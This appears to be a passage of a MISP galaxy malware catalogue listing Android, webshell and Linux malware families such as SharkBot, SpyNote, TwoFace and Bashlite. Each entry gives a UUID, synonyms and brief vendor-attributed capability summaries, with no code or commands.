SharkBot is a piece of malicious software targeting Android Operating Systems (OSes). It is designed to obtain and misuse financial data by redirecting and stealthily initiating money transfers. SharkBot is particularly active in Europe (United Kingdom, Italy, etc.), but its activity has also been detected in the United States.

Internal MISP references

UUID 7b20fdb1-5aee-4f17-a88e-bcd72c893f0a which can be used as unique global reference for SharkBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Shopper

Shopper/LeifAccess is a malicious Android app that uses Android's AccessibilityService to secretly control the device. It installs apps, leaves fake reviews, opens ads, and even registers users on various platforms. Disguised as a system app, it collects personal and device information and sends it to remote servers. The malware was most active in late 2019, especially in Russia, Brazil, and India.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Shopper.

Known Synonyms
LeifAccess
Internal MISP references

UUID e48ccf61-6c7b-400a-8c7f-2e8f3421f32e which can be used as unique global reference for Shopper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SideWinder (Android)

SideWinder involved a fake VPN app for Android devices published on Google Play Store along with a custom tool that filters victims for better targeting.

Internal MISP references

UUID af929cac-e0c6-4a63-ac5a-02c4cbbab746 which can be used as unique global reference for SideWinder (Android) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SilkBean

Internal MISP references

UUID 00ab3d3b-dbbf-40de-b3d8-a3466704a1a7 which can be used as unique global reference for SilkBean in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Skygofree

Internal MISP references

UUID f5fded3c-8f45-471a-a372-d8be101e1b22 which can be used as unique global reference for Skygofree in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Slempo

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Slempo.

Known Synonyms
SlemBunk
Internal MISP references

UUID d87e2574-7b9c-4ea7-98eb-88f3e139f6ff which can be used as unique global reference for Slempo in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Slocker

Slocker also known as jisut and pigetrl, is a screen locker that is distributed through telegram groups.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Slocker.

Known Synonyms
Jisut
Simple Locker
Internal MISP references

UUID fe187c8a-25d4-4d30-bd43-efca18d527f0 which can be used as unique global reference for Slocker in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SmsAgent

SMSAgent appears as a game application, but silently performs malicious routines in the background. It attempts to download other potentially malicious files from a remote server and sends out SMS or MMS messages that places expensive charges on the user's bill.

Internal MISP references

UUID ee42986c-e736-4092-a2f9-2931a02c688d which can be used as unique global reference for SmsAgent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SMSspy

Internal MISP references

UUID 7a38c552-0e1a-4980-8d62-1aa38617efab which can be used as unique global reference for SMSspy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SoumniBot

Internal MISP references

UUID ed53cdaf-0649-4ca5-adcd-592a46f79da8 which can be used as unique global reference for SoumniBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

S.O.V.A.

Internal MISP references

UUID 2aa95661-b63a-432e-8e5e-74ac93b42d57 which can be used as unique global reference for S.O.V.A. in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SpyBanker

Internal MISP references

UUID e186384b-8001-4cdd-b170-1548deb8bf04 which can be used as unique global reference for SpyBanker in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SpyC23

Internal MISP references

UUID 8fb4910f-e645-4465-a202-a20835416c87 which can be used as unique global reference for SpyC23 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SpyMax

SpyMax is a popular Android surveillance tool. Its predecessor, SpyNote, was one of the most widely used spyware frameworks.

Internal MISP references

UUID e1dfb554-4c17-4d4c-ac48-604c48d8ab0b which can be used as unique global reference for SpyMax in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SpyNote

According to Cleafy, SpyNote abuses Accessibility services and other Android permissions in order to: Collect SMS messages and contacts list; Record audio and screen; Perform keylogging activities; Bypass 2FA; Track GPS locations.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SpyNote.

Known Synonyms
CypherRat
Internal MISP references

UUID 31592c69-d540-4617-8253-71ae0c45526c which can be used as unique global reference for SpyNote in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

StealthAgent

Internal MISP references

UUID 0777cb30-534f-44bb-a7af-906a422bd624 which can be used as unique global reference for StealthAgent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Stealth Mango

Internal MISP references

UUID 7d480f11-3de8-463d-8a19-54685c8b9e0f which can be used as unique global reference for Stealth Mango in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Sturnus

According to ThreatFabric, Sturnus is a privately operated Android banking trojan. This malware supports a broad range of fraud-related capabilities, including full device takeover. A key differentiator is its ability to bypass encrypted messaging. By capturing content directly from the device screen after decryption, Sturnus can monitor communications via WhatsApp, Telegram, and Signal.

The trojan can harvest banking credentials through convincing fake login screens that replicate legitimate banking apps. In addition, it provides attackers with extensive remote control, enabling them to observe all user activity, inject text without physical interaction, and even black out the device screen while executing fraudulent transactions in the background—without the victim’s knowledge.

Internal MISP references

UUID 5bd9ebca-e0dd-4d68-8ac9-7a384415d6e2 which can be used as unique global reference for Sturnus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Svpeng

Svpeng is a malicious banking trojan targeting Android devices, and it poses a significant threat to both mobile users and the developers of mobile banking apps. Svpeng has been active since around 2013. It primarily targets Android users, and its main objective is to steal sensitive financial information, particularly login credentials and personal data related to banking and financial apps. Svpeng typically spreads through malicious apps, phishing campaigns, or drive-by downloads.

Internal MISP references

UUID d99c0a47-9d61-4d92-86ec-86a87b060d76 which can be used as unique global reference for Svpeng in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Switcher

Internal MISP references

UUID e3e90666-bc19-4741-aca8-1e4cbc2f4c9e which can be used as unique global reference for Switcher in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

TalentRAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TalentRAT.

Known Synonyms
Assassin RAT
Internal MISP references

UUID 46151a0d-aa0a-466c-9fff-c2c3474f572e which can be used as unique global reference for TalentRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

TangleBot

Internal MISP references

UUID 1e37d712-df02-48aa-82fc-28fa80c92c2b which can be used as unique global reference for TangleBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

TeleRAT

Internal MISP references

UUID e1600d04-d2f7-4862-8bbc-0f038ea683ea which can be used as unique global reference for TeleRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

TemptingCedar Spyware

Tempting cedar spyware is an Android spyware campaign, active since at least 2015, that used social engineering via fake, attractive Facebook profiles to trick victims into downloading malware. The spyware was designed to steal a wide range of sensitive personal data.

Internal MISP references

UUID 982c3554-1df2-4062-8f32-f311940ad9ff which can be used as unique global reference for TemptingCedar Spyware in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

TgToxic

According to Trend Micro, TgToxic has been used in an ongoing campaign that has been targeting Android users in Southeast Asia since July 2022. Goal of the campaign is to steal victims’ assets from finance and banking applications (such as cryptocurrency wallets, credentials for official bank apps on mobile, and money in deposit), via a banking trojan they named TgToxic (based on its special encrypted filename) embedded in multiple fake apps. While previously targeting users in Taiwan, Trend Micro observed the fraudulent activities and phishing lures targeting users from Thailand and Indonesia as of this writing. Users are advised to be wary of opening embedded links from unknown email and message senders, and to avoid downloading apps from third party platforms.

Internal MISP references

UUID 06e9c140-c0de-4abe-97c3-4b0e985114bd which can be used as unique global reference for TgToxic in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ThiefBot

Internal MISP references

UUID 5863d2eb-920d-4263-8c4b-7a16d410ff89 which can be used as unique global reference for ThiefBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

TianySpy

According to Trend Micro, this malware appears to have been designed to steal credentials associated with membership websites of major Japanese telecommunication services.

Internal MISP references

UUID 8260dda5-f608-48f2-9341-28dbc5a8e895 which can be used as unique global reference for TianySpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

TinyZ

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TinyZ.

Known Synonyms
Catelites Android Bot
MarsElite Android Bot
Internal MISP references

UUID 93b27a50-f9b7-4ab6-bb9f-70a4b914eec3 which can be used as unique global reference for TinyZ in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Titan

Internal MISP references

UUID 7d418da3-d9d2-4005-8cc7-7677d1b11327 which can be used as unique global reference for Titan in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ToxicPanda

ToxicPanda is an Android banking RAT first identified by Cleafy in October 2024. It shows similarity to the TgToxic campaign, but appears to be a new development rather than a derivative. The threat actors are likely Chinese speakers. ToxicPanda initially made use of hardcoded C2 domains only, but started to incorporate a DGA in late 2024.

Internal MISP references

UUID 7ac4865d-dc9d-468e-a462-67dfc63d118b which can be used as unique global reference for ToxicPanda in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Triada

Triada is a remote access trojan (RAT) malware that is used to compromise Android devices in order to steal confidential and sensitive information such as credit card numbers, passwords, bank account information, etc. It also provides a backdoor for attackers to include the device as part of a botnet and perform other malicious activities.

Internal MISP references

UUID fa5fdfd2-8142-43f5-9b48-d1033b5398c8 which can be used as unique global reference for Triada in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

TrickMo

TrickMo is an advanced banking trojan for Android. Starting out as a companion malware to TrickBot in 2020, it first became a standalone banking trojan by addition of overlay attacks in 2021 and was later (2024) upgraded with remote control capabilities for on-device fraud. The continued development and progressively improved obfuscation suggests an active Threat Actor.

Internal MISP references

UUID cff89ce1-a133-48a6-b8bd-e4f97cf23d6a which can be used as unique global reference for TrickMo in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Triout

Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.

Internal MISP references

UUID bd9ce51c-53f9-411b-b46a-aba036c433b1 which can be used as unique global reference for Triout in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

TsarBot

According to Cyble, this is a banking trojan that targets over 750 applications globally, including banking, finance, cryptocurrency, and e-commerce apps. The malware spreads via phishing sites masquerading as legitimate financial platforms and is installed through a dropper disguised as Google Play Services. It uses overlay attacks to steal banking credentials, credit card details, and login credentials by displaying fake login pages over legitimate apps. TsarBot can record and remotely control the screen, executing fraud by simulating user actions such as swiping, tapping, and entering credentials while hiding malicious activities using a black overlay screen. It captures device lock credentials using a fake lock screen to gain full control. TsarBot communicates with its C&C server using WebSocket across multiple ports to receive commands, send stolen data, and dynamically execute on-device fraud.

Internal MISP references

UUID 58f59789-6677-403e-8af4-e7a8c7a4cb4b which can be used as unique global reference for TsarBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

UltimaSMS

Internal MISP references

UUID 65476d5f-321f-4385-867a-383094cadb58 which can be used as unique global reference for UltimaSMS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified APK 001

Internal MISP references

UUID bbd5a32e-a080-4f16-98ea-ad8863507aa6 which can be used as unique global reference for Unidentified APK 001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified APK 002

Internal MISP references

UUID afb6a7cc-4185-4f19-8ad4-45dcbb76e544 which can be used as unique global reference for Unidentified APK 002 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified APK 004

According to Check Point Research, this is a RAT that is disguised as a set of dating apps like "GrixyApp", "ZatuApp", "Catch&See", including dedicated websites to conceal their malicious purpose.

Internal MISP references

UUID 55626b63-4b9a-468e-92ae-4b09b303d0ed which can be used as unique global reference for Unidentified APK 004 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified APK 005

Internal MISP references

UUID 5413ca94-1385-40c0-8eb2-1fc3aff87fb1 which can be used as unique global reference for Unidentified APK 005 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified APK 006

Information stealer posing as a fake banking app, targeting Korean users.

Internal MISP references

UUID 2263198d-af38-4e38-a7a8-4435d29d88e8 which can be used as unique global reference for Unidentified APK 006 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified 007 (ARMAAN RAT)

According to Cyble, this is an Android application that pretends to be the legitimate application for the Army Mobile Aadhaar App Network (ARMAAN), intended to be used by Indian army personnel. The application was customized to include RAT functionality.

Internal MISP references

UUID 75c641c4-17df-43c4-9773-c27464c5d2ff which can be used as unique global reference for Unidentified 007 (ARMAAN RAT) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified APK 008

Android malware distributed through fake shopping websites targeting Malaysian users, targeting banking information.

Internal MISP references

UUID 2ffddca0-841c-4eb6-9983-ff38abb5d6d6 which can be used as unique global reference for Unidentified APK 008 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified APK 009 (Chrome Recon)

According to Google, a Chrome reconnaissance payload

Internal MISP references

UUID 6d3bcabe-6b3a-49c1-b1a9-2239ce06deae which can be used as unique global reference for Unidentified APK 009 (Chrome Recon) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

VajraSpy

Internal MISP references

UUID c328b30f-e076-47dc-8c93-4d20f62c72ab which can be used as unique global reference for VajraSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

vamp

Related to the micropsia windows malware and also sometimes named micropsia.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular vamp.

Known Synonyms
android.micropsia
Internal MISP references

UUID 1ad5b462-1b0d-4c2f-901d-ead6c9f227bc which can be used as unique global reference for vamp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

VINETHORN

According to Mandiant, VINETHORN is an Android malware family capable of a wide range of backdoor functionality. It can steal system information, read SMS inboxes, send SMS messages, access contact lists and call histories, record audio and video, and track device location via GPS.

Internal MISP references

UUID 6da6dfb6-2c50-465c-9394-26695d72e8c7 which can be used as unique global reference for VINETHORN in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Viper RAT

Internal MISP references

UUID 3482f5fe-f129-4c77-ae98-76e25f6086b9 which can be used as unique global reference for Viper RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

vo1d

According to Xlab, this malware is used to compromise Android TVs and set-top boxes, and its corresponding botnet had more than 1 million nodes observed via sinkholing (Jan 2025).

Internal MISP references

UUID 7e068dd0-5fc4-4c46-8766-09258654934a which can be used as unique global reference for vo1d in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Vultur

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Vultur.

Known Synonyms
Vulture
Internal MISP references

UUID 49b1c344-ce13-48bf-9839-909ba57649c4 which can be used as unique global reference for Vultur in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

WireX

Internal MISP references

UUID 77f2254c-9886-4eed-a7c3-bbcef4a97d46 which can be used as unique global reference for WireX in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

WolfRAT

Internal MISP references

UUID 994c7bb3-ba40-41bb-89b3-f05996924b10 which can be used as unique global reference for WolfRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Wroba

According to Avira, this is a banking trojan targeting Japan.

Internal MISP references

UUID 40a5d526-ef9f-4ddf-a326-6f33dceeeebc which can be used as unique global reference for Wroba in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

WyrmSpy

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WyrmSpy.

Known Synonyms
AndroidControl
Internal MISP references

UUID 77f81373-bb3a-449d-82ff-b28fe31acef6 which can be used as unique global reference for WyrmSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Xbot

Internal MISP references

UUID 4cfa42a3-71d9-43e2-bf23-daa79f326387 which can be used as unique global reference for Xbot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Xenomorph

Xenomorph is a Android Banking RAT developed by the Hadoken.Security actor.

Internal MISP references

UUID d202e42d-2c35-4c1c-90f1-644a8cae38f1 which can be used as unique global reference for Xenomorph in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

xHelper

Xhelper is a very persistent malware that can reinstall itself after factory reset, Xhelper downloads malicious apps and displays annoying ads.

Internal MISP references

UUID f54dec1f-bec6-4f4a-a909-690d65e0f14b which can be used as unique global reference for xHelper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

XploitSPY

Internal MISP references

UUID 57600f52-b55f-49c7-9c0c-de10b2d23370 which can be used as unique global reference for XploitSPY in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

XRat

Internal MISP references

UUID a8f167a8-30b9-4953-8eb6-247f0d046d32 which can be used as unique global reference for XRat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

YellYouth

Internal MISP references

UUID a2dad59d-2355-415c-b4d6-62236d3de4c7 which can be used as unique global reference for YellYouth in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Zanubis

According to cyware, Zanubis malware pretends to be a malicious PDF application. The threat actor uses it as a key to decrypt responses received from the C2 server.

Internal MISP references

UUID cebf13e5-dbfc-49d6-8715-e3b7687d386f which can be used as unique global reference for Zanubis in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Zen

Internal MISP references

UUID 46d6d102-fc38-46f7-afdc-689cafe13de5 which can be used as unique global reference for Zen in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ZooPark

Internal MISP references

UUID b1fc66de-fda7-4f0c-af00-751d334444b3 which can be used as unique global reference for ZooPark in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Ztorg

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ztorg.

Known Synonyms
Qysly
Internal MISP references

UUID 9fbf97c0-d87a-47b0-a511-0147a58b5202 which can be used as unique global reference for Ztorg in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

LocalOlive

According to Microsoft, this is a web shell, written in ASPX supporting C#, carrying sufficient yet rudimentary functionality to support the following secondary activities: uploading and downloading files, running shell commands, opening a port (default port is set to TCP 250).

Internal MISP references

UUID 96224956-2167-4c19-abc9-dd901043d485 which can be used as unique global reference for LocalOlive in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Nightrunner

WebShell.

Internal MISP references

UUID b0206aac-30ff-41ce-b7d4-1b94ab15e3b1 which can be used as unique global reference for Nightrunner in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Tunna

WebShell.

Internal MISP references

UUID b057f462-dc32-4f7b-95e0-98a20a48f2b2 which can be used as unique global reference for Tunna in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

TwoFace

According to Unit42, TwoFace is a two-staged (loader+payload) webshell, written in C# and meant to run on webservers with ASP.NET. The author of the initial loader webshell included legitimate and expected content that will be displayed if a visitor accesses the shell in a browser, likely to remain undetected. The code in the loader webshell includes obfuscated variable names and the embedded payload is encoded and encrypted. To interact with the loader webshell, the threat actor uses HTTP POST requests to the compromised server.

The secondary webshell, which we call the payload, is embedded within the loader in encrypted form and contains additional functionality that we will discuss in further detail. When the threat actor wants to interact with the remote server, they provide data that the loader will use to modify a decryption key embedded within the loader that will be in turn used to decrypt the embedded TwoFace payload. Commands supported by the payload are execution of programs, up-, download and deletion of files and capability to manipulate MAC timestamps.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TwoFace.

Known Synonyms
HighShell
HyperShell
Minion
SEASHARPEE
Internal MISP references

UUID a98a04e5-1f86-44b8-91ff-dbe1534782ba which can be used as unique global reference for TwoFace in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified ASP 001 (Webshell)

Internal MISP references

UUID d4318f40-a39a-4ce0-8d3c-246d9923d222 which can be used as unique global reference for Unidentified ASP 001 (Webshell) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Abcbot

Abcbot is a modular Go-based botnet and malware that propagates via exploits and brute force attempts. The botnet was observed launching DDoS attacks, perform internet scans, and serve web pages. It is probably linked to Xanthe-based clipjacking campaign.

Internal MISP references

UUID 8d17175b-4e9f-43a9-851d-898bb6696984 which can be used as unique global reference for Abcbot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Abyss Locker

Family based on HelloKitty Ransomware. Encryption algorithm changed from AES to ChaCha. Sample seems to be unpacked.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Abyss Locker.

Known Synonyms
elf.hellokitty
Internal MISP references

UUID 302a96b1-73cb-4f70-a329-e68debd87bf8 which can be used as unique global reference for Abyss Locker in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ACBackdoor (ELF)

A Linux backdoor that was apparently ported to Windows. This entry represents the Linux version. This version appears to have been written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.

Internal MISP references

UUID cd2d7040-edc4-4985-b708-b206b08cc1fe which can be used as unique global reference for ACBackdoor (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AcidPour

Internal MISP references

UUID 11981e96-be46-4ce9-8085-af7224591951 which can be used as unique global reference for AcidPour in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AcidRain

A MIPS ELF binary with wiper functionality used against Viasat KA-SAT modems.

Internal MISP references

UUID 6108aa3d-ea6e-47fd-9344-d333b07f5a56 which can be used as unique global reference for AcidRain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AgeLocker

Internal MISP references

UUID 5d04aac3-fdf5-4922-9976-3a5a75e96e1a which can be used as unique global reference for AgeLocker in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AIRASHI

According to Xlab, this is a DDoS bot.

Internal MISP references

UUID 833056f7-9aae-4846-bc6c-e8a1b00c06b7 which can be used as unique global reference for AIRASHI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AirDropBot

AirDropBot is used to create a DDoS botnet. It spreads as a worm, currently targeting Linksys routers. Backdoor and other bot functionality is present in this family. Development seems to be ongoing.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AirDropBot.

Known Synonyms
CloudBot
Internal MISP references

UUID e91fcb82-e788-44cb-be5d-73b9601b9533 which can be used as unique global reference for AirDropBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Aisuru

Honeypot-aware variant of Mirai.

Internal MISP references

UUID e288425b-40f0-441e-977f-5f1264ed61b6 which can be used as unique global reference for Aisuru in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Akira (ELF)

Ransomware

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Akira (ELF).

Known Synonyms
REDBIKE
Internal MISP references

UUID 365081b9-f60d-4484-befa-d4fc9d0f55d7 which can be used as unique global reference for Akira (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AnchorDNS

Backdoor deployed by the TrickBot actors. It uses DNS as the command and control channel as well as for exfiltration of data.

Internal MISP references

UUID b88dc3ec-d94c-4e6e-a846-5d07130df550 which can be used as unique global reference for AnchorDNS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ANGRYREBEL

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ANGRYREBEL.

Known Synonyms
Ghost RAT
Internal MISP references

UUID 6cb47609-b03e-43d9-a4c7-8342f1011f3b which can be used as unique global reference for ANGRYREBEL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Auto-Color

According to Unit 42, Auto-Color was discovered in November 2024 named based on the file name of the initial payload. It hides its C2 communication similarly to Symbiote, including the use of proprietary encryption algorithms.

Internal MISP references

UUID 4e3f0985-d3c6-429f-89d6-f2e364cf7350 which can be used as unique global reference for Auto-Color in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AvosLocker

AvosLocker is a ransomware-as-a-service (RaaS) gang that first appeared in mid-2021. It has since become notorious for its attacks targeting critical infrastructure in the United States, including the sectors of financial services, critical manufacturing, and government facilities.

In March 2022, the FBI and US Treasury Department issued a warning about the attacks.

Internal MISP references

UUID 8cee7a73-df5f-4ca3-ac52-b8a29a9b7414 which can be used as unique global reference for AvosLocker in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AVrecon

AVrecon is a Linux-based Remote Access Trojan (RAT) targeting small-office/home-office (SOHO) routers and other ARM-embedded devices. The malware is distributed via exploitation of unpatched vulnerabilities or common misconfiguration of the targeted devices. Once deployed, AVreckon will collect some information about the infected device, open a session to pre-configured C&C server, and spawn a remote shell for command execution. It might also download additional arbitrary files and run them. The malware has recently been used in campaigns aimed at ad-fraud activities, password spraying and data exfiltration.

Internal MISP references

UUID 1b218432-dd5c-4593-8f37-e202f9418fff which can be used as unique global reference for AVrecon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

azazel

Azazel is a Linux user-mode rootkit based off of a technique from the Jynx rootkit (LD_PRELOAD technique). Azazel is purportedly more robust than Jynx and has many more anti-analysis features

Internal MISP references

UUID 37374572-3346-4c00-abc9-9f6883c8866e which can be used as unique global reference for azazel in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

B1txor20

B1txor20 is a malware that was discovered by 360 Netlab along others exploiting Log4J. the name is derived from using the file name "b1t", the XOR encrpytion algorithm, and the RC4 algorithm key length of 20 bytes. According to 360 Netlab this Backdoor for Linux platform uses DNS Tunnel to build a C2 communication channel. They also had the assumption that the malware is still in development, because of some bugs and not fully implemented features.

Internal MISP references

UUID 05e6d9ff-93a1-429b-b856-794d9ded75df which can be used as unique global reference for B1txor20 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Babuk (ELF)

ESX and NAS modules for Babuk ransomware.

Internal MISP references

UUID 26b4d805-890b-4767-9d9f-a08adeee1c96 which can be used as unique global reference for Babuk (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Backdoorit

According to Avast Decoded, Backdoorit is a multiplatform RAT written in Go programming language and supporting both Windows and Linux/Unix operating systems. In many places in the code it is also referred to as backd00rit.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Backdoorit.

Known Synonyms
backd00rit
Internal MISP references

UUID 4a4bc444-9e93-47a6-a572-0e13f743d875 which can be used as unique global reference for Backdoorit in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Irc16

Internal MISP references

UUID 3008fa01-492a-42e2-ab9b-a0a9d12823b8 which can be used as unique global reference for Irc16 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BADCALL (ELF)

BADCALL is a Trojan malware variant used by the group Lazarus Group.

Internal MISP references

UUID 350817e8-4d70-455e-b1fd-000bed4a4cf4 which can be used as unique global reference for BADCALL (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Ballista

Ballista is an IoT botnet, infecting unpatched TP-Link Archer AX21 (AX1800) routers. It spreads through automatic exploitation of CVE-2023-1389. Its capabilities include remote code execution and DDoS attacks.

Internal MISP references

UUID a4364bfb-e440-4a57-9c0f-ad5aa76c3868 which can be used as unique global reference for Ballista in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Bashlite

Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bashlite.

Known Synonyms
Gafgyt
gayfgt
lizkebab
qbot
torlus
Internal MISP references

UUID 81917a93-6a70-4334-afe2-56904c1fafe9 which can be used as unique global reference for Bashlite in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BCMPUPnP_Hunter

Internal MISP references

UUID d8dd47a5-85fe-4f07-89dc-00301468d209 which can be used as unique global reference for BCMPUPnP_Hunter in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BianLian (ELF)

Internal MISP references

